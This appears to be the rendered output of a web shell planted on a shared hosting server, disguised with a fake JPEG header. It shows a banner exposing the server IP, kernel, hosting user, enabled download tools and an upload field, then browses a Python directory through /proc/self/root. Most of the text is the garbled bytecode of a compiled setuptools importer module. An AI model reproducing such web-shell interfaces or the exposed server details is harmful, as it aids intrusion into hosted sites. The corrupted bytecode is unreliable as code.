���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.29 / Your IP : 216.73.216.222 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/alt/python27/lib/python2.7/site-packages/setuptools/extern/ |
Upload File : |
� u�fc @ s? d d l Z d d d � � YZ d Z e e e d � j � d S( i����Nt VendorImporterc B sJ e Z d Z d d d � Z e d � � Z d d � Z d � Z d � Z RS( s� A PEP 302 meta path importer for finding optionally-vendored or otherwise naturally-installed packages from root_name. c C s7 | | _ t | � | _ | p- | j d d � | _ d S( Nt externt _vendor( t root_namet sett vendored_namest replacet vendor_pkg( t selfR R R ( ( sK /opt/alt/python27/lib/python2.7/site-packages/setuptools/extern/__init__.pyt __init__ s c c s | j d Vd Vd S( sL Search first the vendor package then as a natural package. t .t N( R ( R ( ( sK /opt/alt/python27/lib/python2.7/site-packages/setuptools/extern/__init__.pyt search_path s c C sL | j | j d � \ } } } | r) d St t | j | j � � sH d S| S( s� Return self when fullname starts with root_name and the target module is one vendored through this importer. R N( t partitionR t anyt mapt startswithR ( R t fullnamet patht roott baset target( ( sK /opt/alt/python27/lib/python2.7/site-packages/setuptools/extern/__init__.pyt find_module s c C s� | j | j d � \ } } } x� | j D]l } yR | | } t | � t j | } | t j | <t j d k r| t j | =n | SWq) t k r� q) Xq) Wt d j t � � � � d S( sK Iterate over the search path to locate and load fullname. R i s� The '{target}' package is required; normally this is bundled with this package so if you get this warning, consult the packager of your distribution.N( i ( R R R t __import__t syst modulest version_infot ImportErrort formatt locals( R R R R R t prefixt extantt mod( ( sK /opt/alt/python27/lib/python2.7/site-packages/setuptools/extern/__init__.pyt load_module# s c C s&